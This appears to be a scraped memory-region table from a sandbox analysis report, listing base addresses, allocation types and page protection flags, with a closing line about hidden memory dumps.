page read and write
|
||
|
392000
|
heap
|
page read and write
|
||
|
3E6000
|
heap
|
page read and write
|
||
|
1C67F000
|
stack
|
page read and write
|
||
|
1A1F2000
|
heap
|
page read and write
|
||
|
4F7F000
|
heap
|
page read and write
|
||
|
130000
|
heap
|
page read and write
|
||
|
37DB000
|
heap
|
page read and write
|
||
|
1B17F000
|
stack
|
page read and write
|
||
|
1A1000
|
heap
|
page read and write
|
||
|
2B00000
|
trusted library allocation
|
page read and write
|
||
|
2160000
|
heap
|
page read and write
|
||
|
400000
|
heap
|
page read and write
|
||
|
41C000
|
heap
|
page read and write
|
||
|
3F4000
|
heap
|
page read and write
|
||
|
31AE000
|
trusted library allocation
|
page read and write
|
||
|
4AAD000
|
heap
|
page read and write
|
||
|
4F78000
|
heap
|
page read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
1DB000
|
heap
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
5B9000
|
heap
|
page read and write
|
||
|
4D3000
|
heap
|
page read and write
|
||
|
1EE0000
|
direct allocation
|
page read and write
|
||
|
3C30000
|
heap
|
page read and write
|
||
|
46A0000
|
trusted library allocation
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
1C4E0000
|
heap
|
page read and write
|
||
|
7FE89996000
|
trusted library allocation
|
page read and write
|
||
|
4CDA000
|
heap
|
page read and write
|
||
|
7FE8999C000
|
trusted library allocation
|
page execute and read and write
|
||
|
406000
|
heap
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
480D000
|
heap
|
page read and write
|
||
|
47CB000
|
heap
|
page read and write
|
||
|
35AA000
|
trusted library allocation
|
page read and write
|
||
|
7FE898E4000
|
trusted library allocation
|
page read and write
|
||
|
28C5000
|
heap
|
page read and write
|
||
|
3E4000
|
heap
|
page read and write
|
||
|
4FD2000
|
heap
|
page read and write
|
||
|
4BE000
|
heap
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
1E0000
|
trusted library allocation
|
page read and write
|
||
|
467000
|
heap
|
page read and write
|
||
|
48B6000
|
heap
|
page read and write
|
||
|
4E3A000
|
heap
|
page read and write
|
||
|
486000
|
heap
|
page read and write
|
||
|
4F01000
|
heap
|
page read and write
|
||
|
199000
|
heap
|
page read and write
|
||
|
477000
|
direct allocation
|
page read and write
|
||
|
1BEE0000
|
heap
|
page read and write
|
||
|
100000
|
heap
|
page read and write
|
||
|
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
|
4D3000
|
heap
|
page read and write
|
||
|
371000
|
heap
|
page read and write
|
||
|
4A01000
|
heap
|
page read and write
|
||
|
4EDA000
|
heap
|
page read and write
|
||
|
1C740000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
3B6C000
|
heap
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
4C58000
|
heap
|
page read and write
|
||
|
384D000
|
heap
|
page read and write
|
||
|
4C87000
|
heap
|
page read and write
|
||
|
4B87000
|
heap
|
page read and write
|
||
|
4E2A000
|
heap
|
page read and write
|
||
|
1E60000
|
heap
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
1A38C000
|
stack
|
page read and write
|
||
|
3864000
|
heap
|
page read and write
|
||
|
1A8000
|
heap
|
page read and write
|
||
|
7FE89B77000
|
trusted library allocation
|
page read and write
|
||
|
3EA000
|
heap
|
page read and write
|
||
|
37CC000
|
heap
|
page read and write
|
||
|
3D00000
|
trusted library allocation
|
page read and write
|
||
|
1FB8000
|
stack
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
4F33000
|
heap
|
page read and write
|
||
|
403F000
|
stack
|
page read and write
|
||
|
1AFAE000
|
stack
|
page read and write
|
||
|
393000
|
heap
|
page read and write
|
||
|
33F000
|
heap
|
page read and write
|
||
|
220000
|
heap
|
page execute and read and write
|
||
|
4CDD000
|
heap
|
page read and write
|
||
|
3EBB000
|
stack
|
page read and write
|
||
|
2951000
|
trusted library allocation
|
page read and write
|
||
|
1B6000
|
heap
|
page read and write
|
||
|
4CDA000
|
heap
|
page read and write
|
||
|
3EA000
|
heap
|
page read and write
|
||
|
4F84000
|
heap
|
page read and write
|
||
|
4CDA000
|
heap
|
page read and write
|
||
|
4CC3000
|
heap
|
page read and write
|
||
|
359E000
|
trusted library allocation
|
page read and write
|
||
|
275F000
|
trusted library allocation
|
page read and write
|
||
|
4CDA000
|
heap
|
page read and write
|
||
|
4CC3000
|
heap
|
page read and write
|
||
|
3844000
|
heap
|
page read and write
|
||
|
7FE89A8C000
|
trusted library allocation
|
page read and write
|
||
|
1B4000
|
heap
|
page read and write
|
||
|
3FC000
|
heap
|
page read and write
|
||
|
4E30000
|
heap
|
page read and write
|
||
|
4D09000
|
heap
|
page read and write
|
||
|
2343000
|
trusted library allocation
|
page read and write
|
||
|
3BC7000
|
heap
|
page read and write
|
||
|
119000
|
heap
|
page read and write
|
||
|
3862000
|
heap
|
page read and write
|
||
|
4F80000
|
heap
|
page read and write
|
||
|
1A1CF000
|
stack
|
page read and write
|
||
|
7FE89980000
|
trusted library allocation
|
page read and write
|
||
|
430000
|
heap
|
page read and write
|
||
|
59AE000
|
trusted library allocation
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
3576000
|
trusted library allocation
|
page read and write
|
||
|
2B40000
|
trusted library allocation
|
page read and write
|
||
|
465000
|
heap
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
37B000
|
heap
|
page read and write
|
||
|
1A5CE000
|
stack
|
page read and write
|
||
|
5B7000
|
heap
|
page read and write
|
||
|
298F000
|
trusted library allocation
|
page read and write
|
||
|
4D02000
|
heap
|
page read and write
|
||
|
3650000
|
trusted library allocation
|
page read and write
|
||
|
4CD7000
|
heap
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
480D000
|
heap
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
4CDA000
|
heap
|
page read and write
|
||
|
7FE898D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
19A000
|
heap
|
page read and write
|
||
|
4F8F000
|
heap
|
page read and write
|
||
|
31B000
|
heap
|
page read and write
|
||
|
300000
|
heap
|
page read and write
|
||
|
3588000
|
trusted library allocation
|
page read and write
|
||
|
542000
|
heap
|
page read and write
|
||
|
2357000
|
trusted library allocation
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
1FC0000
|
direct allocation
|
page read and write
|
||
|
1AE0F000
|
stack
|
page read and write
|
||
|
53C000
|
heap
|
page read and write
|
||
|
4F71000
|
heap
|
page read and write
|
||
|
4F9C000
|
heap
|
page read and write
|
||
|
576000
|
heap
|
page read and write
|
||
|
3E4E000
|
stack
|
page read and write
|
||
|
4CFA000
|
heap
|
page read and write
|
||
|
5EB000
|
heap
|
page read and write
|
||
|
5000000
|
trusted library allocation
|
page read and write
|
||
|
4150000
|
trusted library allocation
|
page read and write
|
||
|
35AB000
|
trusted library allocation
|
page read and write
|
||
|
359A000
|
trusted library allocation
|
page read and write
|
||
|
4BF000
|
heap
|
page read and write
|
||
|
143000
|
heap
|
page read and write
|
||
|
4E32000
|
heap
|
page read and write
|
||
|
2D7000
|
heap
|
page read and write
|
||
|
1DA0000
|
direct allocation
|
page read and write
|
||
|
35AA000
|
trusted library allocation
|
page read and write
|
||
|
7FE898E2000
|
trusted library allocation
|
page read and write
|
||
|
4B80000
|
heap
|
page read and write
|
||
|
1B04F000
|
stack
|
page read and write
|
||
|
1F3F000
|
stack
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
199000
|
heap
|
page read and write
|
||
|
3C3E000
|
heap
|
page read and write
|
||
|
29B3000
|
trusted library allocation
|
page read and write
|
||
|
2F0000
|
trusted library allocation
|
page read and write
|
||
|
1C0000
|
heap
|
page read and write
|
||
|
1BFF0000
|
heap
|
page read and write
|
||
|
3844000
|
heap
|
page read and write
|
||
|
36D000
|
heap
|
page read and write
|
||
|
5B4000
|
heap
|
page read and write
|
||
|
1BEE5000
|
heap
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
BF000
|
heap
|
page read and write
|
||
|
2B0000
|
trusted library allocation
|
page read and write
|
||
|
5171000
|
heap
|
page read and write
|
||
|
48B000
|
direct allocation
|
page read and write
|
||
|
7FE898FB000
|
trusted library allocation
|
page read and write
|
||
|
4980000
|
heap
|
page read and write
|
||
|
4B84000
|
heap
|
page read and write
|
||
|
4D09000
|
heap
|
page read and write
|
||
|
1C457000
|
heap
|
page read and write
|
||
|
486000
|
heap
|
page read and write
|
||
|
3C37000
|
heap
|
page read and write
|
||
|
4CDE000
|
heap
|
page read and write
|
||
|
4CDA000
|
heap
|
page read and write
|
||
|
4FC8000
|
heap
|
page read and write
|
||
|
3ACE000
|
trusted library allocation
|
page read and write
|
||
|
5590000
|
heap
|
page read and write
|
||
|
3C6F000
|
stack
|
page read and write
|
||
|
2C4000
|
heap
|
page read and write
|
||
|
3829000
|
heap
|
page read and write
|
||
|
3595000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
370000
|
trusted library allocation
|
page read and write
|
||
|
1B1B6000
|
heap
|
page read and write
|
||
|
4F9A000
|
heap
|
page read and write
|
||
|
3C3D000
|
heap
|
page read and write
|
||
|
283E000
|
stack
|
page read and write
|
||
|
4C57000
|
heap
|
page read and write
|
||
|
4A00000
|
heap
|
page read and write
|
||
|
4902000
|
heap
|
page read and write
|
||
|
3867000
|
heap
|
page read and write
|
||
|
4E27000
|
heap
|
page read and write
|
||
|
5171000
|
heap
|
page read and write
|
||
|
4F20000
|
heap
|
page read and write
|
||
|
4D09000
|
heap
|
page read and write
|
||
|
393000
|
heap
|
page read and write
|
||
|
1A6000
|
heap
|
page read and write
|
||
|
3C39000
|
heap
|
page read and write
|
||
|
7FE898DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
5A7000
|
heap
|
page read and write
|
||
|
4A5C000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
106000
|
heap
|
page read and write
|
||
|
3C25000
|
heap
|
page read and write
|
||
|
311000
|
heap
|
page read and write
|
||
|
4AA000
|
heap
|
page read and write
|
||
|
43F000
|
heap
|
page read and write
|
||
|
1A1000
|
heap
|
page read and write
|
||
|
4C57000
|
heap
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
4D02000
|
heap
|
page read and write
|
||
|
3B6B000
|
trusted library allocation
|
page read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
480E000
|
heap
|
page read and write
|
||
|
3EC000
|
heap
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
3586000
|
trusted library allocation
|
page read and write
|
||
|
483A000
|
trusted library allocation
|
page read and write
|
||
|
1C422000
|
heap
|
page read and write
|
||
|
3480000
|
heap
|
page read and write
|
||
|
20A0000
|
heap
|
page execute and read and write
|
||
|
36E0000
|
heap
|
page read and write
|
||
|
2748000
|
trusted library allocation
|
page read and write
|
||
|
1AF9E000
|
stack
|
page read and write
|
||
|
4F7E000
|
heap
|
page read and write
|
||
|
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
|
37DE000
|
heap
|
page read and write
|
||
|
2FF000
|
trusted library allocation
|
page read and write
|
||
|
261F000
|
stack
|
page read and write
|
||
|
4F91000
|
heap
|
page read and write
|
||
|
3BD1000
|
heap
|
page read and write
|
||
|
4F84000
|
heap
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
38BD000
|
heap
|
page read and write
|
||
|
4C50000
|
heap
|
page read and write
|
||
|
1AB000
|
direct allocation
|
page read and write
|
||
|
1A1000
|
heap
|
page read and write
|
||
|
5599000
|
heap
|
page read and write
|
||
|
190000
|
heap
|
page read and write
|
||
|
357A000
|
trusted library allocation
|
page read and write
|
||
|
325E000
|
stack
|
page read and write
|
||
|
2F3000
|
heap
|
page read and write
|
||
|
4979000
|
trusted library allocation
|
page read and write
|
||
|
2957000
|
trusted library allocation
|
page read and write
|
||
|
4CD5000
|
heap
|
page read and write
|
||
|
5209000
|
heap
|
page read and write
|
||
|
4C4E000
|
heap
|
page read and write
|
||
|
3D80000
|
trusted library allocation
|
page read and write
|
||
|
3EB000
|
heap
|
page read and write
|
||
|
321000
|
heap
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
4979000
|
trusted library allocation
|
page read and write
|
||
|
1BA0000
|
heap
|
page read and write
|
||
|
40DB000
|
stack
|
page read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
2CDA000
|
stack
|
page read and write
|
||
|
301000
|
stack
|
page read and write
|
||
|
7FE89AD8000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
59C000
|
heap
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
|
7FE898E0000
|
trusted library allocation
|
page read and write
|
||
|
3C4B000
|
heap
|
page read and write
|
||
|
3C3D000
|
heap
|
page read and write
|
||
|
2962000
|
trusted library allocation
|
page read and write
|
||
|
4B56000
|
heap
|
page read and write
|
||
|
3829000
|
heap
|
page read and write
|
||
|
3AE3000
|
heap
|
page read and write
|
||
|
1E47000
|
direct allocation
|
page read and write
|
||
|
3C2B000
|
heap
|
page read and write
|
||
|
41E0000
|
trusted library allocation
|
page read and write
|
||
|
5AE000
|
heap
|
page read and write
|
||
|
3BF000
|
heap
|
page read and write
|
||
|
4FC4000
|
heap
|
page read and write
|
||
|
465000
|
heap
|
page read and write
|
||
|
5570000
|
trusted library allocation
|
page read and write
|
||
|
3C3B000
|
heap
|
page read and write
|
||
|
4B78000
|
heap
|
page read and write
|
||
|
4F82000
|
heap
|
page read and write
|
||
|
68D000
|
heap
|
page read and write
|
||
|
3DE000
|
heap
|
page read and write
|
||
|
4BF000
|
heap
|
page read and write
|
||
|
2E0000
|
trusted library allocation
|
page read and write
|
||
|
236F000
|
stack
|
page read and write
|
||
|
389000
|
heap
|
page read and write
|
||
|
2A4000
|
heap
|
page read and write
|
||
|
4C50000
|
heap
|
page read and write
|
||
|
21F000
|
heap
|
page read and write
|
||
|
1B166000
|
heap
|
page read and write
|
||
|
3B4000
|
heap
|
page read and write
|
||
|
3571000
|
trusted library allocation
|
page read and write
|
||
|
58F000
|
heap
|
page read and write
|
||
|
3C3D000
|
heap
|
page read and write
|
||
|
2BD5000
|
heap
|
page read and write
|
||
|
38B4000
|
heap
|
page read and write
|
||
|
3C4F000
|
heap
|
page read and write
|
||
|
18F000
|
heap
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
4FC9000
|
heap
|
page read and write
|
||
|
3290000
|
heap
|
page read and write
|
||
|
4B7E000
|
heap
|
page read and write
|
||
|
3B70000
|
heap
|
page read and write
|
||
|
1BEAC000
|
stack
|
page read and write
|
||
|
1C27F000
|
stack
|
page read and write
|
||
|
103000
|
stack
|
page read and write
|
||
|
392000
|
heap
|
page read and write
|
||
|
392000
|
heap
|
page read and write
|
||
|
51EE000
|
heap
|
page read and write
|
||
|
3C32000
|
heap
|
page read and write
|
||
|
2953000
|
trusted library allocation
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
4BF5000
|
heap
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
7FE89A83000
|
trusted library allocation
|
page read and write
|
||
|
2A7000
|
heap
|
page read and write
|
||
|
1B14E000
|
stack
|
page read and write
|
||
|
35AE000
|
trusted library allocation
|
page read and write
|
||
|
4D09000
|
heap
|
page read and write
|
||
|
4F7F000
|
heap
|
page read and write
|
||
|
1C23E000
|
stack
|
page read and write
|
||
|
4D03000
|
heap
|
page read and write
|
||
|
5A4000
|
heap
|
page read and write
|
||
|
4CD5000
|
heap
|
page read and write
|
||
|
3CF4000
|
trusted library allocation
|
page read and write
|
||
|
2672000
|
trusted library allocation
|
page read and write
|
||
|
3860000
|
heap
|
page read and write
|
||
|
2B7000
|
heap
|
page read and write
|
||
|
1B04C000
|
stack
|
page read and write
|
||
|
3658000
|
trusted library allocation
|
page read and write
|
||
|
4FC9000
|
heap
|
page read and write
|
||
|
1EF000
|
heap
|
page read and write
|
||
|
4190000
|
trusted library allocation
|
page read and write
|
||
|
14E000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
4C57000
|
heap
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
36DF000
|
heap
|
page read and write
|
||
|
45C0000
|
heap
|
page read and write
|
||
|
3450000
|
remote allocation
|
page read and write
|
||
|
179000
|
heap
|
page read and write
|
||
|
5171000
|
heap
|
page read and write
|
||
|
431C000
|
stack
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
3430000
|
trusted library allocation
|
page read and write
|
||
|
559000
|
heap
|
page read and write
|
||
|
7FE898E0000
|
trusted library allocation
|
page read and write
|
||
|
1AE000
|
heap
|
page read and write
|
||
|
48C000
|
heap
|
page read and write
|
||
|
2751000
|
trusted library allocation
|
page read and write
|
||
|
2684000
|
heap
|
page read and write
|
||
|
2C0B000
|
heap
|
page read and write
|
||
|
1E80000
|
heap
|
page read and write
|
||
|
436000
|
heap
|
page read and write
|
||
|
4A66000
|
heap
|
page read and write
|
||
|
2347000
|
trusted library allocation
|
page read and write
|
||
|
4F9A000
|
heap
|
page read and write
|
||
|
3A30000
|
trusted library allocation
|
page read and write
|
||
|
2B44000
|
heap
|
page read and write
|
||
|
1C690000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
4C66000
|
heap
|
page read and write
|
||
|
1160000
|
heap
|
page read and write
|
||
|
48D000
|
direct allocation
|
page read and write
|
||
|
3C4A000
|
heap
|
page read and write
|
||
|
1FC7000
|
direct allocation
|
page read and write
|
||
|
3B6B000
|
heap
|
page read and write
|
||
|
3583000
|
trusted library allocation
|
page read and write
|
||
|
22B4000
|
trusted library allocation
|
page read and write
|
||
|
5570000
|
trusted library allocation
|
page read and write
|
||
|
1CE4000
|
heap
|
page read and write
|
||
|
37DE000
|
heap
|
page read and write
|
||
|
5DE000
|
heap
|
page read and write
|
||
|
357B000
|
trusted library allocation
|
page read and write
|
||
|
4CD5000
|
heap
|
page read and write
|
||
|
385F000
|
heap
|
page read and write
|
||
|
3C30000
|
heap
|
page read and write
|
||
|
7FE89AD4000
|
trusted library allocation
|
page read and write
|
||
|
3E6000
|
heap
|
page read and write
|
||
|
4AC3000
|
heap
|
page read and write
|
||
|
3B6B000
|
trusted library allocation
|
page read and write
|
||
|
220000
|
heap
|
page read and write
|
||
|
4E7B000
|
heap
|
page read and write
|
||
|
37DA000
|
heap
|
page read and write
|
||
|
4D0E000
|
heap
|
page read and write
|
||
|
357E000
|
trusted library allocation
|
page read and write
|
||
|
35D0000
|
heap
|
page read and write
|
||
|
368000
|
stack
|
page read and write
|
||
|
480D000
|
heap
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
4F9B000
|
heap
|
page read and write
|
||
|
1F36000
|
heap
|
page read and write
|
||
|
3C34000
|
heap
|
page read and write
|
||
|
4A6F000
|
heap
|
page read and write
|
||
|
334000
|
heap
|
page read and write
|
||
|
37DA000
|
heap
|
page read and write
|
||
|
4E30000
|
heap
|
page read and write
|
||
|
1A6E9000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1B2C0000
|
heap
|
page read and write
|
||
|
2B4000
|
heap
|
page read and write
|
||
|
2764000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AB2000
|
trusted library allocation
|
page read and write
|
||
|
684000
|
heap
|
page read and write
|
||
|
2DF000
|
heap
|
page read and write
|
||
|
4FC8000
|
heap
|
page read and write
|
||
|
52F0000
|
heap
|
page read and write
|
||
|
4E32000
|
heap
|
page read and write
|
||
|
33F000
|
heap
|
page read and write
|
||
|
3C4F000
|
heap
|
page read and write
|
||
|
4959000
|
heap
|
page read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
1D90000
|
heap
|
page read and write
|
||
|
7FE89AC4000
|
trusted library allocation
|
page read and write
|
||
|
207F000
|
stack
|
page read and write
|
||
|
12090000
|
trusted library allocation
|
page read and write
|
||
|
1B0CC000
|
stack
|
page read and write
|
||
|
34B6000
|
heap
|
page read and write
|
||
|
51EE000
|
heap
|
page read and write
|
||
|
522000
|
heap
|
page read and write
|
||
|
47C0000
|
trusted library allocation
|
page read and write
|
||
|
342E000
|
stack
|
page read and write
|
||
|
359E000
|
trusted library allocation
|
page read and write
|
||
|
1000000
|
trusted library allocation
|
page read and write
|
||
|
2F3000
|
heap
|
page read and write
|
||
|
461000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A70000
|
trusted library allocation
|
page read and write
|
||
|
287A000
|
trusted library allocation
|
page read and write
|
||
|
4F7E000
|
heap
|
page read and write
|
||
|
1013000
|
trusted library allocation
|
page read and write
|
||
|
1A6CF000
|
stack
|
page read and write
|
||
|
1AAC9000
|
stack
|
page read and write
|
||
|
23EE000
|
trusted library allocation
|
page read and write
|
||
|
28C1000
|
trusted library allocation
|
page read and write
|
||
|
4FD2000
|
heap
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
2940000
|
remote allocation
|
page read and write
|
||
|
144000
|
heap
|
page read and write
|
||
|
7FE89AD4000
|
trusted library allocation
|
page read and write
|
||
|
36D9000
|
heap
|
page read and write
|
||
|
7FE898ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
4FC4000
|
heap
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
45D000
|
heap
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
120B1000
|
trusted library allocation
|
page read and write
|
||
|
150000
|
direct allocation
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
38B2000
|
heap
|
page read and write
|
||
|
4970000
|
trusted library allocation
|
page read and write
|
||
|
3E6000
|
heap
|
page read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
520A000
|
heap
|
page read and write
|
||
|
49C8000
|
heap
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
1FE000
|
heap
|
page read and write
|
||
|
1C453000
|
heap
|
page read and write
|
||
|
528A000
|
heap
|
page read and write
|
||
|
12081000
|
trusted library allocation
|
page read and write
|
||
|
3E4000
|
heap
|
page read and write
|
||
|
190000
|
direct allocation
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
3C1E000
|
heap
|
page read and write
|
||
|
36D6000
|
heap
|
page read and write
|
||
|
384C000
|
heap
|
page read and write
|
||
|
1F00000
|
direct allocation
|
page read and write
|
||
|
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
|
6DAE000
|
trusted library allocation
|
page read and write
|
There are 1542 hidden memdumps, click here to show them.